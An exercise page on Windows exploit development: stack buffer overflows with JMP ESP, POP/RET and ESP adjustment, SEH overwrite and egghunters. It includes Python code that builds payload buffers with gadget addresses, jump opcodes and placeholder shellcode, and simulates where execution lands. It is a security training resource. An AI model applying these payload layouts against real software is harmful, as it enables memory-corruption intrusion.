Exploit Development Windows Exercise

Exercise 0 - Basic BO (Buffer Overflow)

Once the overwritten return address is popped, ESP points at the bytes that follow the EIP slot in your buffer, so shellcode placed right there is reached with a JMP ESP.

Exercise 1 - pop + ret

There are 4 bytes of data in front of your shellcode, right where ESP points after the return. You need a POP reg; RET gadget: the POP discards those 4 bytes, and the RET takes the following dword as the new EIP, from where you get to ESP (a JMP ESP) and your shellcode.

Exercise 2 - add/sub [reg] + jmp

No register points directly to your shellcode, and ESP is 100 bytes away from it. You need to adjust ESP (ADD ESP / SUB ESP by the right amount, taking care that the immediate contains no bad characters such as null bytes) so that it points to your shellcode, and then a way to JMP ESP.
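The following is an added example, not code from the exercise page or its author: a small Python model of the stack at the moment the vulnerable function returns, used to check where each of the buffer layouts for Exercises 0, 1 and 2 actually lands. The gadget addresses, the EIP offset of 268, the INT3 stand-in shellcode and the "program clobbers the 4 bytes after EIP" behaviour for Exercise 1 are assumptions. It goes beyond the 100-byte case in the text: adjust_esp chains ADD ESP, imm8 / SUB ESP, imm8 instructions so that any distance is covered without a null byte in the buffer (the imm32 forms would contain one).

```python
import struct


def p32(v):
    """Little-endian dword, as the target is 32-bit x86."""
    return struct.pack("<I", v & 0xFFFFFFFF)


# Hypothetical gadget addresses (assumption: found in a module of the target
# with a disassembler; they are not from the exercise page).
JMP_ESP_ADDR = 0x10011AB8      # FF E4   jmp esp
POP_RET_ADDR = 0x10012C40      # 58 C3   pop eax ; ret
GADGETS = {JMP_ESP_ADDR: [("jmp_esp",)], POP_RET_ADDR: [("pop",), ("ret",)]}

JMP_ESP = b"\xff\xe4"          # jmp esp, when it sits inside our own buffer
SHELLCODE = b"\xcc" * 32       # constructed stand-in (INT3s), not real shellcode
EIP_OFF = 268                  # assumed offset of the saved return address


def adjust_esp(delta):
    """Emit ADD ESP, imm8 (83 C4 ib) or SUB ESP, imm8 (83 EC ib) moving ESP
    by delta. Steps are capped at 0x7F so every immediate fits one non-null
    byte; larger distances simply chain several instructions."""
    op = b"\x83\xc4" if delta >= 0 else b"\x83\xec"
    remaining, out = abs(delta), b""
    while remaining:
        step = min(remaining, 0x7F)
        out += op + bytes([step])
        remaining -= step
    return out


def run_in_buffer(buf, off, esp):
    """Execution has entered our buffer at off. Decode the only stub
    instructions this example uses (add/sub esp, imm8 and jmp esp) and return
    the offset of the first byte that is not one of them: the shellcode."""
    for _ in range(64):
        if buf[off:off + 2] == b"\x83\xc4":
            esp += buf[off + 2]; off += 3
        elif buf[off:off + 2] == b"\x83\xec":
            esp -= buf[off + 2]; off += 3
        elif buf[off:off + 2] == JMP_ESP:
            off = esp
        else:
            return off
    return None


def simulate(buf, eip_off, gadgets=GADGETS):
    """Model the vulnerable RET with the stack overwritten by buf. ESP is an
    offset into buf (the buffer *is* the stack). Returns the buffer offset
    where execution ends up, or None if EIP goes somewhere unplanned."""
    esp = eip_off

    def pop():
        nonlocal esp
        value = struct.unpack("<I", buf[esp:esp + 4])[0]
        esp += 4
        return value

    eip = pop()                      # the function's own RET eats the EIP slot
    for _ in range(16):              # bounded: do not loop on a bad chain
        if eip not in gadgets:
            return None
        for op in gadgets[eip]:
            if op[0] == "pop":
                pop()                # discard one dword
            elif op[0] == "ret":
                eip = pop()          # next dword becomes EIP
            elif op[0] == "jmp_esp":
                return run_in_buffer(buf, esp, esp)
    return None


def exercise0(eip_off=EIP_OFF, shellcode=SHELLCODE):
    """Basic BO: [padding][jmp esp][shellcode]; ESP is right after EIP."""
    return b"A" * eip_off + p32(JMP_ESP_ADDR) + shellcode


def exercise1(eip_off=EIP_OFF, shellcode=SHELLCODE):
    """pop + ret: the 4 bytes after EIP are unusable (assumed: the program
    writes to them after the overflow). [padding][pop;ret][4 bytes][jmp esp][shellcode]"""
    return b"A" * eip_off + p32(POP_RET_ADDR) + b"XXXX" + p32(JMP_ESP_ADDR) + shellcode


def exercise2(eip_off=EIP_OFF, shellcode=SHELLCODE, distance=0x64):
    """add esp + jmp: shellcode starts `distance` bytes past ESP. The stub at
    ESP moves ESP forward and jumps there: [padding][jmp esp][stub][filler][shellcode]"""
    stub = adjust_esp(distance) + JMP_ESP
    if len(stub) >= distance:
        raise ValueError("stub does not fit in front of the shellcode")
    return b"A" * eip_off + p32(JMP_ESP_ADDR) + stub + b"B" * (distance - len(stub)) + shellcode


def clobber_after_eip(buf, eip_off):
    """Assumed target behaviour for exercise 1: the 4 bytes after the saved
    EIP are overwritten before the function returns."""
    out = bytearray(buf)
    out[eip_off + 4:eip_off + 8] = b"\x00\x00\x00\x00"
    return bytes(out)


def lands_on_shellcode(buf, eip_off, shellcode=SHELLCODE):
    """True if the chain ends with EIP at the first byte of the shellcode."""
    off = simulate(buf, eip_off)
    return off is not None and buf[off:off + len(shellcode)] == shellcode


if __name__ == "__main__":
    for name, buf in (("ex0", exercise0()), ("ex1", exercise1()), ("ex2", exercise2())):
        print(name, "lands at offset", simulate(buf, EIP_OFF), lands_on_shellcode(buf, EIP_OFF))
    # Only the pop/ret layout survives a target that clobbers the bytes after EIP.
    print("ex0 clobbered:", lands_on_shellcode(clobber_after_eip(exercise0(), EIP_OFF), EIP_OFF))
    print("ex1 clobbered:", lands_on_shellcode(clobber_after_eip(exercise1(), EIP_OFF), EIP_OFF))
```

The simulator only knows the two gadgets and the stub instructions above; anything else counts as a crash, which is the right default when checking a layout offline before sending it to the target.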

Exercise 3 - SEH (Structured Exception Handler)

How to use the Structured Exception Handler to execute your shellcode: overwrite the handler pointer of an SEH record on the stack and trigger an exception, so that the exception dispatcher calls an address of your choosing instead of the real handler.
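An added example (not from the exercise page or its author) of the usual SEH layout and a check that it lands where intended. The POP POP RET address, the nSEH offset of 600 and the INT3 stand-in shellcode are assumptions. The one fact the model relies on is how the dispatcher calls a handler: on entry, [esp+8] holds the address of the exception registration record, so a POP POP RET returns into the record's first field (nSEH), where a short jump over the handler dword reaches the shellcode.

```python
import struct


def p32(v):
    return struct.pack("<I", v & 0xFFFFFFFF)


# Hypothetical address of a POP r32 ; POP r32 ; RET sequence in a module
# without SafeSEH (assumption for this example, not from the page).
POP_POP_RET = 0x1001A2B3
SHELLCODE = b"\xcc" * 32        # constructed stand-in for real shellcode
NSEH_OFF = 600                  # assumed offset of the nSEH field in our buffer


def short_jmp(from_off, to_off):
    """jmp short (EB disp8) placed at from_off and landing at to_off. The
    displacement counts from the end of the 2-byte instruction. Returns None
    when the target is out of the -128..127 range."""
    disp = to_off - (from_off + 2)
    if not -128 <= disp <= 127:
        return None
    return b"\xeb" + struct.pack("<b", disp)


def seh_payload(nseh_off=NSEH_OFF, shellcode=SHELLCODE):
    """Layout: [junk][nSEH: jmp short +6, 2 nops][SEH: pop pop ret][shellcode].
    Returns (buffer, shellcode offset)."""
    sc_off = nseh_off + 8                        # right after the 8-byte record
    jmp = short_jmp(nseh_off, sc_off)
    if jmp is None:
        raise ValueError("shellcode not reachable with a short jump")
    nseh = jmp + b"\x90\x90"                     # EB 06 90 90
    record = nseh + p32(POP_POP_RET)
    if b"\x00" in record:
        raise ValueError("record contains a null byte")   # assumed bad char
    return b"A" * nseh_off + record + shellcode, sc_off


def simulate_seh_dispatch(buf, nseh_off):
    """Model the exception dispatch: the OS calls the handler pointer stored
    at nseh_off+4 with the record address at [esp+8]; POP POP RET therefore
    returns into the nSEH field. Returns the buffer offset reached after
    executing the short jump found there, or None if the handler is not ours."""
    handler = struct.unpack("<I", buf[nseh_off + 4:nseh_off + 8])[0]
    if handler != POP_POP_RET:
        return None
    landing = nseh_off                           # EIP = address of the record
    if buf[landing] != 0xEB:
        return landing                           # no jump: nSEH bytes run as code
    disp = struct.unpack("<b", buf[landing + 1:landing + 2])[0]
    return landing + 2 + disp


def lands_on_shellcode(nseh_off=NSEH_OFF, shellcode=SHELLCODE):
    buf, sc_off = seh_payload(nseh_off, shellcode)
    off = simulate_seh_dispatch(buf, nseh_off)
    return off == sc_off and buf[off:off + len(shellcode)] == shellcode


if __name__ == "__main__":
    buf, sc_off = seh_payload()
    print("nSEH bytes:", buf[NSEH_OFF:NSEH_OFF + 4].hex())
    print("dispatch lands at", simulate_seh_dispatch(buf, NSEH_OFF), "shellcode at", sc_off)
```

On a real target the address must come from a module without SafeSEH, and the exception still has to be triggered (typically by making the overflow run past the end of the stack).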

Exercise 4 - EggHunter

You have a very small buffer for your shellcode, so you need to use an egghunter: a tiny search stub that fits in the small buffer, scans memory for a tag (the egg) placed in front of the real shellcode somewhere else in memory, and jumps to it.
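An added example (not from the exercise page or its author) modelling what the egghunter does, so the two details that usually go wrong can be checked offline: the egg is the 4-byte tag repeated twice, because the hunter itself contains the tag once and must not find its own copy, and unreadable pages have to be skipped rather than touched. The memory image, page addresses, buffer size and INT3 stand-in shellcode are all constructed for the example; the real hunter tests page readability with a syscall instead of a Python None.

```python
TAG = b"w00t"                  # 4-byte tag; the egg is the tag twice
EGG = TAG * 2
PAGE = 0x1000
SHELLCODE = b"\xcc" * 300      # constructed stand-in for a large payload
SMALL_BUFFER = 40              # assumed size of the buffer we control at EIP time

# Constructed fragment standing in for the hunter stub: mov eax, "w00t"
# (B8 + tag) followed by its compare-and-jump tail. It carries the tag once.
HUNTER = b"\xb8" + TAG + b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"


def egg_payload(shellcode=SHELLCODE, tag=TAG):
    """What goes into the larger input: egg first, then the real shellcode."""
    return tag * 2 + shellcode


def hunt(pages, egg=EGG):
    """Model of the hunter loop. pages: {base: bytes or None}; None means
    the page is not readable (the real hunter learns that from a syscall
    return value and moves to the next page instead of faulting). Scans
    every byte offset and returns the address right after the first egg."""
    for base in sorted(pages):
        data = pages[base]
        if data is None:
            continue
        for i in range(len(data) - len(egg) + 1):
            if data[i:i + len(egg)] == egg:
                return base + i + len(egg)
    return None


def read(pages, addr, n):
    """Fetch n bytes from the page model (None if the page is unreadable)."""
    base = addr & ~(PAGE - 1)
    data = pages.get(base)
    return None if data is None else data[addr - base:addr - base + n]


def sample_memory(shellcode=SHELLCODE):
    """Constructed image: the hunter in our small buffer, an unmapped page in
    between, and egg + shellcode wherever the larger input ended up."""
    small = HUNTER + b"\x90" * (SMALL_BUFFER - len(HUNTER))
    page0 = b"\x00" * 0x100 + small
    page2 = b"\x41" * 0x300 + egg_payload(shellcode)
    return {
        0x00400000: page0 + b"\x00" * (PAGE - len(page0)),
        0x00401000: None,
        0x00402000: page2 + b"\x00" * (PAGE - len(page2)),
    }


def hunter_finds_shellcode(shellcode=SHELLCODE):
    """True if the hunter lands exactly on the first byte of the shellcode."""
    mem = sample_memory(shellcode)
    addr = hunt(mem)
    return addr is not None and read(mem, addr, len(shellcode)) == shellcode


if __name__ == "__main__":
    mem = sample_memory()
    print("hunter fits in small buffer:", len(HUNTER) <= SMALL_BUFFER)
    print("double tag -> shellcode at 0x%08x" % hunt(mem))
    print("single tag -> would stop at 0x%08x (the hunter itself)" % hunt(mem, egg=TAG))
```

Search with the tag once and the model returns an address inside the hunter's own page, which is exactly the self-match the double tag avoids.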

Resources: